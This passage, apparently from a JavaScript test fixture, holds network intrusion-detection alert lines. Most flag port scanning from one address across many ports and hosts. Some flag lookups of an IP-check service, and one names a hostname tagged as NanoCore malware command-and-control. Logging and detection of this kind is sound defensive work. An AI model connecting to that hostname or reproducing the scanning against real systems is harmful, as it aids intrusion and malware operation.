52066,52068,52735,52736,52737,52738,52739,52741,52742,52743,52745,52746,52747,52748,52750,52751,52752,52753,52755,52756,52758,52759,52761,52762,52763,52766,52767,52771,52773,52775,52776,52778,53139,53140,53142,53143,53146,53150,53153,53157,53165,53169,53172,53175,53217,53218,53221,53222,53223,53225,53226,53227,53229,53230,53231,53233,53234,53235,53242,53244,53247,53248,53251,53252,53256,53259,53260,53263,53264,53267,53268,53273,53275,53277,53279,53280,53283,53284,53287,53288,53291,53295,53302,53306,53307,53311,53314,53316,53318,53320,53322,53324,53326,53330,53333,53334,53338,53346,53350,53355,53359,53362,53365,53367,53368,53371,53372,53378,53384,53386,53389,53393,53397,53407,53408,53411,53412,53415,53416,53419,53421,53422,53424,53425,53426,53429,53433,53437,53439,53443,53445,53447,53449,53451,53455,53457,53462,53463,53468,53473,53474,53479,53481,53487,53488,53491,53494,53497,53499,53502,53503,53507,53512,53515,53516,53517,53518,53524,53525,53528,53534,53536,53539,53550,53553,53556,53559,53561,53562,53563,53564,53566,53567,53568,53570,53571,53572,53575,53576,53577,53579,53580,53583,53584,53585,53588,53589,53593,53600,53601,53603,53606,53607,53608,53609,53610,53611,53612,53613,53614,53615,53616,53618,53619,53620,53621,53628,53629,53632,53633,53636,53639,53642,53645,53656,53659,53664,53665,53669,53674,53676,53677,53682,53691,53695,53701,53704,53707,53709,53711,53713,53714,53717,53718,53720,53721,53725,53727,53728,53731,53733,53737,53740,53743,53745,53747,53749,53751,53753,53756,53758,53759,53760,53765,53768,53771,53773,53774,53778,53779,53921,53924,53926,53928,53930,53932,53935,53937,53940,53941,53944,53945,53948,53966,53969,53970,53974,53976,53977,53978,53985,53990,53993,53994,53996,54036,54393,54411,54455,55219,55222,55403,55405,55406,55408,55409,55410,55411,55412,55413,55414,55415,55417,55418,55419,55420,55421,55422,55423,55424,55425,55426,55428,55431,55432,55433,55434,55436,55437,55438,55441,55442,55445,55446,55448,55449,55450,55453,55456,55458,55459,55461,55462,55463,55738,55990,56111,56250,56252,56256,56261,56264,56270,56273,56285,56289,56290,56294,56295,56298,56300,56378,56380,56384,56387,56389,56396,56406,56411,56418,56426,56430,56433,56436,56439,56447,56451,56470,56472,56474,56477,56479,56482,56485,56507,56510,56513,56516,56519,56522,56684,56688,56692,56700,56702,56796,56807,56811,56815,56821,56826,56830,56834,56838,56842,56845,56850,56853,56859,56909,56917,56921,56925,57131,57135,57140,57144,57794,57796,57797,57799,57800,57802,57805,57806,57808,57811,57815,57945,57952,57973,57978,57982,57986,57990,57994,57997,58000,58003,58006,58009,58012,58015,58018,58022,58073,58145,58154,58510,58511,58513,58515,58517,58518,58520,58524,58526,58527,58529,58530,58532,58533,58535,58536,58538,58541,58543,58544,58546,58547,58549,58550,58552,58554,58555,58557,58558,58559,58561,58562,58563,58566,58567,58571,58573,58574,58575,58577,58578,58579,58580,58582,58583,58584,58586,58587,58588,58589,58591,58592,58593,58595,58596,58597,58599,58600,58602,58603,58607,58610,58611,58613,58615,58617,58619,58620,58634,58637,58641,58649,58653,58657,58665,58671,58674,58676,58677,58681,58682,58684,58685,58688,58689,58690,58692,58693,58694,58695,58697,58698,58699,58700,58701,58704,58705,58706,58707,58711,58712,58715,58716,58720,58724,58725,58727,58731,58732,58733,58734,58736,58737,58738,58740,58741,58742,58747,58748,58750,58751,58753,58759,58761,58762,58764,58768,58769,58771,58772,58774,58775,58777,58778,58780,58781,58782,58784,58785,58787,58788,58790,58792,58793,58795,58798,58800,58803,58804,58806,58807,58809,58810,58812,58813,58815,58816,58819,58820,58823,58825,58826,58828,58830,58831,58832,58833,58834,58835,58836,58837,58838,58839,58840,58841,58843,58844,58845,58846,58847,58848,58849,58850,58851,58852,58853,58855,58856,58857,58858,58860,58864,58865,58866,58867,58868,58870,58872,58873,58874,58875,58877,58879,58880,58881,58882,58884,58885,58886,58887,58888,58889,58890,58891,58893,58894,58895,58896,58897,58898,58899,58900,58901,58902,58904,58905,58906,58907,58909,58910,58911,58912,58913,58915,58916,58917,58919,58920,58921,58922,58923,58924,58925,58926,58927,58928,58929,58930,58931,58932,58933,58934,58935,58936,58937,58938,58939,58940,58941,58942,58943,58944,58945,58947,58948,58949,58950,58951,58952,58953,58956,58958,58959,58960,58961,58962,58963,58965,58966,58967,58969,58970,58971,58973,58974,58975,58976,58977,58978,58979,58980,58982,58984,58986,58987,58989,58990,58991,58992,58993,58994,58995,59151,59170,59174,59482,59495,59518,59533,60215,60393,60399,60402,60407,60410,60413,60416,60422,60425,60428,60431,60433,60537,60549,60593,60720,60836,60949,61014,61036,61084,61087,61091,61093,61097,61101,61103,61109,61112,61115,61160,61168,61177,61501,61543,61589,61598,61601,61604,61606,61608,61610,61634,61639,61659,61663,61672,61676,61680,61685,61690,61695,61740,61759,61783,61788,61801,61833,61902,61904,61944,61969,62009,62021,62096,62792,62803,62809,62812,62854,62867,62868,62897,62900,62903,62905,62907,62909,62910,62913,62916,62919,62924,62945,62982,62998,63117,63119,63120,63123,63127,63135,63139,63143,63150,63152,63155,63156,63159,63160,63162,63163,63164,63166,63168,63170,63172,63174,63175,63176,63179,63180,63182,63190,63195,63199,63202,63211,63227,63236,63241,63245,63246,63248,63250,63251,63255,63257,63260,63261,63281,63283,63284,63286,63287,63289,63290,63293,63294,63295,63296,63298,63315,63319,63320,63321,63323,63326,63328,63330,63332,63334,63339,63344,63346,63347,63348,63349,63352,63355,63356,63357,63359,63361,63362,63621,63635,63942,63978,63980,63983,63986,64064,64087,64093,64096,64115,64120,64143,64154,64165,64276,64278,64281,64282,64283,64285,64287,64288,64291,64293,64294,64295,64297,64299,64301,64303,64305,64306,64318,64322,64349,64356,64358,64361,64374,64377,64390,64410,64480,64512,64523,64532,64536,64545,64547,64562,64597,64656,64698,64726,64732,64778,64811,64819,64826,64831,64849,64853,64857,64858,64861,64865,64873,64915,65004,65037,65048,65077,65090,65137,65205,65235,65252,65270,65320,65479 2.200.101.0,2.200.101.10,2.200.101.106,2.200.101.108,2.200.101.112,2.200.101.115,2.200.101.120,2.200.101.122,2.200.101.125,2.200.101.13,2.200.101.139,2.200.101.147,2.200.101.155,2.200.101.156,2.200.101.165,2.200.101.175,2.200.101.179,2.200.101.187,2.200.101.20,2.200.101.21,2.200.101.213,2.200.101.217,2.200.101.225,2.200.101.226,2.200.101.228,2.200.101.230,2.200.101.240,2.200.101.25,2.200.101.28,2.200.101.3,2.200.101.32,2.200.101.34,2.200.101.41,2.200.101.47,2.200.101.48,2.200.101.5,2.200.101.63,2.200.101.85,2.200.101.87,2.200.98.98,2.200.99.100,2.200.99.102,2.200.99.103,2.200.99.105,2.200.99.106,2.200.99.108,2.200.99.109,2.200.99.111,2.200.99.112,2.200.99.113,2.200.99.114,2.200.99.115,2.200.99.116,2.200.99.117,2.200.99.118,2.200.99.119,2.200.99.120,2.200.99.121,2.200.99.122,2.200.99.123,2.200.99.124,2.200.99.125,2.200.99.126,2.200.99.127,2.200.99.33,2.200.99.34,2.200.99.36,2.200.99.37,2.200.99.41,2.200.99.64,2.200.99.68,2.200.99.69,2.200.99.70,2.200.99.71,2.200.99.72,2.200.99.73,2.200.99.74,2.200.99.75,2.200.99.76,2.200.99.77,2.200.99.78,2.200.99.79,2.200.99.80,2.200.99.81,2.200.99.82,2.200.99.83,2.200.99.84,2.200.99.85,2.200.99.86,2.200.99.87,2.200.99.88,2.200.99.89,2.200.99.91,2.200.99.92,2.200.99.93,2.200.99.94,2.200.99.95,2.200.99.96,2.200.99.97,2.200.99.98,2.200.99.99 80,81,808,3128,3129,3130,8000,8080,8081,8090,8118,8888,9090,9999,53281 TCP IP 91.123.157.56 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 02:55:58.000453" r2d2 91.123.157.56 1038,1043,1128,1162,1196,1290,1361,1392,2365,2371,2400,2407,2504,3159,3160,3237,3238,3239,3240,3241,3243,3244,3245,3246,3247,3248,4186,4206,4217,4223,4226,4232,4844,7673,7681,7688,7692,7696,8490,8491,8492,8493,8494,8495,8497,8498,8499,8500,8501,8502,8503,8504,8505,8506,8507,8508,8509,8510,8511,8512,8514,8515,8516,8517,8518,8519,8535,8536,8538,8539,8542,8545,8551,8553,8556,8559,8563,8566,8569,8573,8685,8731,8738,8741,8744,8747,8750,8753,8759,8761,8763,8766,8776,8779,8782,8787,8790,8793,8795,8798,8800,8803,8809,8811,8813,8936,8944,8952,9043,9045,9046,9048,9049,9051,9052,9053,9054,9055,9057,9103,9104,9105,9108,9109,9110,9111,9112,9113,9114,9115,9116,9117,9634,9648,9651,9654,9657,9660,9663,9665,9668,9670,9673,9680,9683,9686,9689,9746,9747,9748,9749,9751,9752,9753,9754,9755,9756,9757,9758,9761,9762,9763,9764,9765,9766,9767,9768,9770,9771,9772,10064,10066,10067,10068,10069,10071,10072,10073,10074,10075,10077,10079,10625,10636,10713,10730,13795,13796,13797,13798,18522,19912,19918,19922,19928,20139,20879,22392,22395,22399,22402,22405,22408,22414,22418,22422,22424,22458,22460,22461,22477,22478,22479,22480,22481,22482,22483,22484,22486,22487,22488,22491,22537,22538,22539,22540,22541,22542,22543,22544,22545,22546,22547,22548,22553,22554,22555,22556,22557,22558,22559,22560,22562,22564,22565,22566,22567,22568,22569,22570,22571,22572,22573,22574,22575,22576,22577,22578,22579,22581,22598,22599,22600,22601,22602,22603,22604,22606,22607,22608,22611,22846,22847,22848,22851,22852,22853,22854,22856,22857,22858,22859,26190,26191,26192,26193,26194,26195,26196,26197,26198,26199,26200,26201,26202,26203,26204,26205,26206,26207,26208,26209,26210,26211,26212,26213,26214,26215,26216,26217,26218,26219,26220,26221,26222,26223,26224,26225,26227,26228,26229,26230,26231,26232,26233,26234,26235,26236,26237,26238,26239,26240,26241,26242,26243,26244,26245,26246,26247,26248,26249,26250,26251,26252,26253,26254,26255,26256,26257,26258,26259,26260,26261,26262,26263,26264,51429,51430,51433,51434,51435,51436,51438,51439,51440,51441,51442,51443,51657,51659,51661,51662,51663,51664,51667,51670,51673,51675,51676,51956,51957,51959,51962,51963,51964,51965,51966,51967,51968,51969,52306,52308,52311,52312,52314,52317,52319,52320,52322,52324,52325,52735,52736,52737,52738,52739,52741,52742,52743,52745,52746,52747,52748,52750,52751,52752,52753,52755,52756,52758,52759,52761,52762,52763,52766,52767,52771,52773,52775,52776,52778,53139,53140,53142,53143,53146,53150,53153,53157,53165,53169,53172,53175,53217,53218,53221,53222,53223,53225,53226,53227,53229,53230,53231,53233,53234,53235,53242,53244,53247,53248,53251,53252,53256,53259,53260,53263,53264,53267,53268,53273,53275,53277,53279,53280,53283,53284,53287,53288,53291,53295,53302,53306,53307,53311,53314,53316,53318,53320,53322,53324,53326,53330,53333,53334,53338,53346,53350,53355,53359,53362,53365,53367,53368,53371,53372,53378,53384,53386,53389,53393,53397,53407,53408,53411,53412,53415,53416,53419,53421,53422,53424,53425,53426,53429,53433,53437,53439,53443,53445,53447,53449,53451,53455,53457,53462,53463,53468,53473,53474,53479,53481,53487,53488,53491,53494,53497,53499,53502,53503,53507,53512,53515,53516,53517,53518,53524,53525,53528,53534,53536,53539,53550,53553,53556,53559,53561,53562,53563,53564,53566,53567,53568,53570,53571,53572,53575,53576,53577,53579,53580,53583,53584,53585,53588,53589,53593,53600,53601,53603,53606,53607,53608,53609,53610,53611,53612,53613,53614,53615,53616,53618,53619,53620,53621,53628,53629,53632,53633,53636,53639,53642,53645,53656,53664,53665,53669,53674,53676,53677,53682,53691,53695,53701,53704,53707,53709,53711,53713,53714,53717,53718,53720,53721,53725,53727,53728,53731,53733,53737,53740,53743,53745,53747,53749,53751,53753,53756,53758,53759,53760,53765,53768,53771,53773,53774,53778,53779,53921,53924,53926,53928,53930,53932,53935,53937,53940,53941,53944,53945,53948,53966,53969,53970,53974,53976,53977,53978,53985,53990,53993,53994,53996,54036,54393,54411,54455,55403,55405,55406,55408,55409,55410,55411,55412,55413,55414,55415,55417,55418,55419,55420,55421,55422,55423,55424,55425,55426,55428,55431,55432,55433,55434,55436,55437,55438,55441,55442,55445,55446,55448,55449,55450,55453,55456,55458,55459,55461,55462,55463,55738,55895,55898,55903,55905,55909,55911,55913,55915,55919,55923,55925,55990,56111,56697,56700,56702,56796,56799,56807,56811,56815,56821,56826,56834,56838,57061,57064,57072,57073,57076,57079,57080,57082,57086,57087,57088,58510,58513,58515,58517,58518,58520,58524,58526,58527,58529,58530,58532,58533,58535,58536,58538,58541,58543,58544,58546,58547,58550,58552,58554,58555,58558,58559,58562,58563,58566,58567,58571,58573,58575,58577,58578,58580,58582,58584,58586,58588,58589,58592,58593,58596,58597,58598,58599,58600,58602,58603,58607,58609,58610,58611,58613,58614,58615,58617,58618,58619,58620,58626,58629,58633,58634,58636,58637,58639,58641,58648,58649,58652,58653,58657,58665,58671,58674,58676,58677,58681,58682,58684,58685,58688,58689,58690,58692,58693,58694,58695,58697,58698,58699,58700,58701,58704,58705,58706,58707,58711,58712,58715,58716,58720,58724,58725,58727,58731,58732,58733,58734,58736,58737,58738,58740,58741,58742,58747,58748,58750,58751,58753,58759,58761,58762,58764,58768,58769,58771,58772,58774,58775,58777,58778,58780,58781,58782,58784,58785,58787,58788,58790,58792,58793,58795,58798,58800,58803,58804,58806,58807,58809,58810,58812,58813,58815,58816,58819,58820,58823,58825,58826,58828,58830,58831,58832,58833,58834,58835,58836,58837,58838,58839,58840,58841,58843,58844,58845,58846,58847,58848,58849,58850,58851,58852,58853,58855,58856,58857,58858,58860,58864,58865,58866,58867,58868,58870,58872,58873,58874,58875,58877,58879,58880,58881,58882,58884,58885,58886,58887,58888,58889,58890,58891,58893,58894,58895,58896,58897,58898,58899,58900,58901,58902,58904,58905,58906,58907,58909,58910,58911,58912,58913,58915,58916,58917,58919,58920,58921,58922,58923,58924,58925,58926,58927,58928,58929,58930,58931,58932,58933,58934,58935,58936,58937,58938,58939,58940,58941,58942,58943,58944,58945,58947,58948,58949,58950,58951,58952,58953,58956,58958,58959,58960,58961,58962,58963,58965,58966,58967,58969,58970,58971,58973,58974,58975,58976,58977,58978,58979,58980,58982,58984,58986,58987,58989,58990,58991,58992,58993,58994,58995,59151,59170,59174,59482,59495,59518,59533,60215,60537,60549,60593,60720,60836,60949,60977,60979,60982,61005,61008,61011,61014,61015,61036,61062,61065,61068,61071,61074,61091,61160,61168,61177,61501,61543,61634,61639,61699,61703,61707,61717,61721,61726,61731,61739,61740,61748,61753,61759,61763,61783,61788,61801,61833,61902,61904,61944,61969,62009,62021,62096,62792,62803,62809,62812,62829,62834,62840,62845,62854,62855,62867,62868,62870,62874,62878,62883,62887,62891,62909,62945,62982,62998,63152,63156,63160,63168,63172,63179,63181,63183,63185,63187,63193,63195,63199,63201,63207,63208,63211,63212,63216,63220,63225,63229,63298,63315,63344,63360,63364,63365,63375,63380,63385,63608,63632,63705,63942,63982,64058,64064,64087,64093,64096,64115,64120,64143,64154,64165,64276,64278,64281,64282,64283,64285,64287,64288,64291,64293,64294,64295,64297,64299,64301,64303,64305,64318,64322,64349,64356,64358,64361,64374,64377,64390,64410,64480,64512,64545,64547,64562,64597,64698,64726,64732,64778,64811,64819,64831,64858,64915,65004,65037,65048,65077,65090,65137,65205,65235,65252,65270,65320,65479 2.200.101.0,2.200.101.104,2.200.101.106,2.200.101.107,2.200.101.110,2.200.101.111,2.200.101.112,2.200.101.115,2.200.101.116,2.200.101.118,2.200.101.120,2.200.101.125,2.200.101.129,2.200.101.147,2.200.101.169,2.200.101.187,2.200.101.19,2.200.101.200,2.200.101.228,2.200.101.242,2.200.101.3,2.200.101.36,2.200.101.37,2.200.101.42,2.200.101.45,2.200.101.49,2.200.101.64,2.200.101.65,2.200.101.8,2.200.101.84,2.200.101.92,2.200.98.174,2.200.98.190,2.200.99.100,2.200.99.101,2.200.99.102,2.200.99.103,2.200.99.104,2.200.99.105,2.200.99.106,2.200.99.107,2.200.99.108,2.200.99.109,2.200.99.110,2.200.99.111,2.200.99.112,2.200.99.114,2.200.99.115,2.200.99.117,2.200.99.118,2.200.99.119,2.200.99.121,2.200.99.123,2.200.99.124,2.200.99.125,2.200.99.127,2.200.99.33,2.200.99.34,2.200.99.36,2.200.99.37,2.200.99.64,2.200.99.68,2.200.99.69,2.200.99.70,2.200.99.71,2.200.99.72,2.200.99.73,2.200.99.74,2.200.99.75,2.200.99.76,2.200.99.77,2.200.99.78,2.200.99.79,2.200.99.80,2.200.99.81,2.200.99.82,2.200.99.83,2.200.99.84,2.200.99.85,2.200.99.86,2.200.99.87,2.200.99.88,2.200.99.89,2.200.99.90,2.200.99.91,2.200.99.92,2.200.99.93,2.200.99.94,2.200.99.95,2.200.99.96,2.200.99.97,2.200.99.98,2.200.99.99 80,81,808,3128,3129,3130,8000,8080,8081,8090,8118,8888,9090,9999,53281 TCP IP 91.123.157.56 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 02:56:01.000174" r2d2 91.123.157.56 2068,3180,3181,3182,3183,3184,3185,3187,3188,3190,3237,3238,3239,3240,3241,3242,3243,3244,3246,3247,3248,3249,3251,8490,8491,8492,8493,8495,8496,8498,8499,8500,8501,8502,8731,8738,8741,8747,8750,8753,8756,8761,8763,8769,8774,8816,8819,8825,8988,8989,8990,8991,8992,8993,8995,8996,9028,9029,9030,9031,9032,9036,9037,9038,9039,9040,9041,9042,9103,9104,9105,9107,9108,9109,9111,9112,9113,9115,9116,9193,9194,9195,9196,9197,9602,9605,9608,9614,9630,9638,9641,9746,9748,9749,9750,9751,9752,9753,9754,9755,9756,9757,9762,9763,9764,9765,9766,9767,9768,9769,9770,9771,9772,9773,9817,9819,9821,9823,9829,9833,9835,9837,9839,9841,9843,10033,10035,10037,10044,10046,10048,10052,10054,10056,10058,10062,22313,22316,22318,22327,22329,22331,22333,22335,22337,22340,22344,22478,22479,22480,22482,22483,22484,22485,22486,22487,22488,22489,22597,22598,22599,22600,22601,22602,22603,22604,22605,22607,22608,22609,22610,22691,22694,22696,22698,22700,22702,22704,22706,22708,22710,22798,22800,22847,22848,22849,22850,22851,22852,22854,22855,22856,22857,22858,22860,26190,26191,26192,26193,26194,26195,26196,26197,26198,26199,26200,26201,26202,26203,26204,26205,26206,26207,26208,26209,26210,26211,26212,26213,26214,26215,26216,26217,26218,26219,26220,26221,26222,26223,26224,26225,26226,26227,26228,26229,26230,26231,26232,26233,26234,26235,26236,26237,26238,26239,26240,26241,26242,26243,26244,26245,26246,26247,26248,26249,26250,26251,26252,26253,26254,26255,26256,26257,26258,26259,26260,26261,26262,26263,26264,39864,51430,51431,51432,51433,51434,51435,51436,51437,51438,51440,51442,53139,53142,53143,53146,53150,53153,53157,53165,53169,53172,53217,53218,53222,53225,53226,53227,53231,53233,53234,53235,53242,53244,53247,53248,53251,53260,53263,53264,53268,53273,53275,53277,53279,53280,53283,53284,53287,53288,53291,53302,53306,53307,53311,53314,53316,53408,53411,53412,53415,53416,53419,53421,53422,53424,53425,53426,53429,53433,53437,53439,53443,53445,53449,53451,53455,53463,53468,53473,53499,53512,53515,53516,53517,53518,53524,53525,53528,53534,53536,53539,53550,53553,53559,53562,53564,53567,53568,53570,53572,53575,53577,53603,53607,53608,53610,53612,53613,53615,53618,53619,53620,53621,53628,53629,53632,53633,53636,53639,53642,53645,53656,53664,53665,53669,53674,53676,53682,53691,53695,53701,53704,53707,53709,53711,53713,53714,53717,53718,53747,53749,53751,53753,53756,53758,53759,53760,53765,53768,53771,53773,53774,53778,53779,53926,53928,53930,53935,53937,53940,53941,53944,53945,53948,53966,53969,53970,53974,53976,53977,53978,53985,53990,53993,53994,53996,54393,54411,54455,55403,55405,55406,55408,55409,55410,55411,55412,55413,55414,55415,55417,55418,55419,55420,55421,55422,55423,55424,55425,55426,55428,55431,55432,55433,55434,55436,55437,55438,55441,55442,55445,55446,55448,55449,55450,55453,55456,55458,55459,55461,55462,55463,55738,55990,56111,56250,56252,56256,56264,56273,56285,56289,56290,56294,56298,56300,57061,57072,57073,57076,57079,57080,57082,57086,57087,57088,57089,57671,57676,57685,57689,57696,57699,57702,57705,57708,57724,57728,58510,58513,58515,58517,58518,58520,58524,58526,58527,58529,58530,58532,58533,58535,58536,58538,58541,58543,58544,58546,58547,58550,58552,58554,58555,58558,58559,58562,58563,58566,58567,58571,58573,58575,58577,58578,58580,58582,58584,58586,58588,58589,58592,58593,58596,58597,58599,58600,58602,58603,58607,58610,58611,58613,58615,58617,58619,58620,58634,58637,58641,58649,58653,58657,58665,58671,58674,58676,58677,58681,58682,58684,58685,58688,58689,58690,58692,58693,58694,58695,58697,58698,58699,58700,58701,58704,58705,58706,58707,58711,58712,58715,58716,58720,58724,58725,58727,58731,58732,58733,58734,58736,58737,58738,58740,58741,58742,58747,58748,58750,58751,58753,58759,58761,58762,58764,58768,58769,58771,58772,58774,58775,58777,58778,58780,58781,58782,58784,58785,58787,58788,58790,58792,58793,58795,58798,58800,58803,58804,58806,58807,58809,58810,58812,58813,58815,58816,58819,58820,58823,58825,58826,58828,58830,58831,58832,58833,58834,58835,58836,58837,58838,58839,58840,58841,58843,58844,58845,58846,58847,58848,58849,58850,58851,58852,58853,58855,58856,58857,58858,58860,58864,58865,58866,58867,58868,58870,58872,58873,58874,58875,58877,58879,58880,58881,58882,58884,58885,58886,58887,58888,58889,58890,58891,58893,58894,58895,58896,58897,58898,58899,58900,58901,58902,58904,58905,58906,58907,58909,58910,58911,58912,58913,58915,58916,58917,58919,58920,58921,58922,58923,58924,58925,58926,58927,58928,58929,58930,58931,58932,58933,58934,58935,58936,58937,58938,58939,58940,58941,58942,58943,58944,58945,58947,58948,58949,58950,58951,58952,58953,58956,58958,58959,58960,58961,58962,58963,58965,58966,58967,58969,58970,58971,58973,58974,58975,58976,58977,58978,58979,58980,58982,58984,58986,58987,58989,58990,58991,58992,58993,58994,58995,59151,59170,59174,59482,59495,59518,59533,60215,60537,60549,60593,60720,60836,60949,61014,61036,61091,61160,61168,61177,61501,61543,61634,61639,61740,61759,61783,61788,61801,61833,61902,61904,61944,61969,62009,62021,62096,62792,62803,62809,62812,62854,62867,62868,62909,62945,62982,62998,63000,63001,63003,63004,63005,63007,63008,63011,63012,63013,63150,63158,63159,63163,63166,63167,63170,63171,63174,63177,63178,63180,63181,63189,63193,63197,63204,63211,63212,63216,63220,63225,63298,63315,63344,63360,63928,63942,64064,64087,64093,64096,64115,64120,64143,64154,64165,64276,64278,64281,64282,64283,64285,64287,64288,64291,64299,64301,64318,64322,64356,64361,64374,64377,64410,64480,64512,64545,64547,64562,64597,64778,64831 2.200.101.0,2.200.101.10,2.200.101.101,2.200.101.102,2.200.101.106,2.200.101.11,2.200.101.110,2.200.101.111,2.200.101.115,2.200.101.125,2.200.101.133,2.200.101.148,2.200.101.165,2.200.101.169,2.200.101.177,2.200.101.19,2.200.101.2,2.200.101.20,2.200.101.3,2.200.101.64,2.200.101.84,2.200.101.94,2.200.98.190,2.200.98.98,2.200.99.100,2.200.99.101,2.200.99.102,2.200.99.104,2.200.99.105,2.200.99.106,2.200.99.107,2.200.99.108,2.200.99.109,2.200.99.110,2.200.99.111,2.200.99.112,2.200.99.114,2.200.99.115,2.200.99.117,2.200.99.119,2.200.99.121,2.200.99.124,2.200.99.125,2.200.99.127,2.200.99.33,2.200.99.36,2.200.99.64,2.200.99.68,2.200.99.69,2.200.99.70,2.200.99.71,2.200.99.72,2.200.99.73,2.200.99.75,2.200.99.77,2.200.99.78,2.200.99.79,2.200.99.80,2.200.99.81,2.200.99.82,2.200.99.83,2.200.99.85,2.200.99.86,2.200.99.87,2.200.99.88,2.200.99.90,2.200.99.91,2.200.99.93,2.200.99.95,2.200.99.96,2.200.99.98,2.200.99.99 80,81,808,3128,3129,3130,8000,8080,8081,8090,8118,8888,9090,9999,53281 TCP IP 91.123.157.56 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 02:56:05.000714" r2d2 91.123.157.56 2068,3180,3181,3182,3183,3184,3186,3187,3188,3189,3191,3238,3239,3240,3241,3242,3243,3244,3245,3246,3247,3248,3249,3251,8490,8491,8492,8493,8495,8496,8497,8498,8500,8501,8502,8504,8506,8507,8508,8509,8511,8512,8513,8514,8515,8516,8517,8731,8738,8741,8747,8750,8753,8759,8761,8766,8769,8774,8776,8779,8782,8787,8790,8793,8795,8798,8806,8809,8813,9043,9045,9048,9049,9051,9052,9053,9054,9055,9056,9057,9194,9195,9196,9197,9602,9605,9608,9614,9630,9638,9641,9728,9730,9731,9732,9734,9736,9737,9738,9739,9740,9741,9743,9845,9850,9852,9854,9858,9860,9864,9866,9870,9872,9874,9906,9911,9917,9919,9921,9923,9925,9927,9931,9933,9935,10084,10086,10088,10092,10094,10096,10098,10102,10108,10110,10112,10114,10116,10119,10124,10128,10130,10132,10134,10138,10142,10144,10179,10181,10183,10185,10187,10189,10191,10193,10195,10197,10201,10208,22346,22348,22352,22355,22363,22366,22369,22372,22375,22382,22385,22389,25156,25157,25158,25159,25160,25161,25162,25164,25165,25168,25170,26190,26191,26192,26193,26194,26195,26196,26197,26198,26199,26200,26201,26202,26203,26204,26205,26206,26207,26208,26209,26210,26211,26212,26213,26214,26215,26216,26217,26218,26219,26220,26221,26222,26223,26224,26225,26226,26227,26228,26229,26230,26231,26232,26233,26234,26235,26236,26237,26238,26239,26240,26241,26242,26243,26244,26245,26246,26247,26248,26249,26250,26251,26252,26253,26254,26255,26256,26257,26258,26259,26260,26261,26262,26263,26264,39864,58939,58940,58941,58942,58943,58944,58945,58947,58948,58949,58950,58951,58952,58953,58956 2.200.101.10,2.200.101.104,2.200.101.106,2.200.101.112,2.200.101.115,2.200.101.131,2.200.101.141,2.200.101.145,2.200.101.146,2.200.101.153,2.200.101.156,2.200.101.169,2.200.101.177,2.200.101.4,2.200.101.5,2.200.101.92,2.200.99.101,2.200.99.104,2.200.99.107,2.200.99.110,2.200.99.121,2.200.99.90 80,81,808,3128,3129,3130,8000,8080,8081,8090,8118,8888,9090,9999,53281 TCP IP 91.123.157.56 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 02:56:10.000570" r2d2 91.123.157.56 3193,3194,3195,3196,3197,3198,3199,3200,3201,3203,3204,3206,8490,8491,8492,8493,8494,8496,8498,8499,8500,8501,8502,8506,8507,8508,8509,8510,8512,8514,8515,8516,8518,8519,8731,8738,8741,8744,8747,8750,8761,8763,8769,8771,8774,9043,9044,9045,9046,9047,9048,9049,9050,9051,9052,9053,9088,9089,9091,9093,9094,9095,9096,9097,9098,9100,9102,9148,9150,9151,9152,9154,9155,9158,9159,9160,9161,9162,9648,9651,9654,9660,9665,9668,9670,9673,9680,9683,9686,9689,9747,9748,9749,9751,9753,9754,9755,9756,9757,9758,9759,9761,9762,9763,9764,9765,9766,9768,9770,9771,9772,9773,9774,9775,9876,9880,9882,9886,9888,9890,9894,9896,9898,9900,9904,9977,9978,9979,9980,9981,9983,9985,9987,9991,9997,9999,10005,10007,10009,10011,10015,10017,10021,10022,10027,10029,10031,26190,26191,26192,26193,26194,26195,26196,26197,26198,26199,26200,26201,26202,26203,26204,26205,26206,26207,26208,26209,26210,26211,26212,26213,26214,26215,26216,26217,26218,26219,26220,26221,26222,26223,26224,26225,26226,26227,26228,26229,26230,26231,26232,26233,26234,26235,26236,26237,26238,26239,26240,26241,26242,26243,26244,26245,26246,26247,26248,26249,26250,26251,26252,26253,26254,26255,26256,26257,26258,26259,26260,26261,26262,26263,26264 2.200.101.0,2.200.101.106,2.200.101.112,2.200.101.115,2.200.101.149,2.200.101.150,2.200.101.154,2.200.101.175,2.200.101.3,2.200.101.79,2.200.101.8,2.200.101.88,2.200.101.92,2.200.99.101,2.200.99.104,2.200.99.107,2.200.99.110,2.200.99.90 80,81,808,3128,3129,3130,8000,8080,8081,8090,8118,8888,9090,9999,53281 TCP IP 91.123.157.56 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 02:56:11.000302" r2d2 91.123.157.56 8520,8521,8522,8523,8524,8525,8526,8528,8529,8531,8532,8534,8819,8822,8825,8987,8988,8989,8991,8993,8995,8996,8997,9030,9031,9032,9034,9035,9036,9037,9038,9039,9040,9041,9103,9104,9105,9107,9108,9111,9112,9113,9115,9116,9117,9746,9747,9748,9749,9751,9752,9753,9754,9755,9756,9758,9760,10066,10067,10068,10069,10070,10071,10072,10073,10074,10077,10079 2.200.101.102,2.200.101.109,2.200.101.147,2.200.101.3,2.200.101.84,2.200.101.94 80,81,808,3128,3129,3130,8000,8080,8081,8090,8118,8888,9090,9999,53281 TCP IP 91.123.157.56 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 02:56:36.989791" r2d2 10.3.160.42 23388 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:56:37.089584" r2d2 10.3.160.42 23388 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:56:37.189640" r2d2 10.3.160.42 23388 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:56:37.389403" r2d2 10.3.160.42 23388 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:56:38.092978" r2d2 10.3.160.42 23388 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:56:38.589557" r2d2 10.3.160.42 23388 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:56:59.611148" r2d2 2.200.110.232 65375 2.200.107.169 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
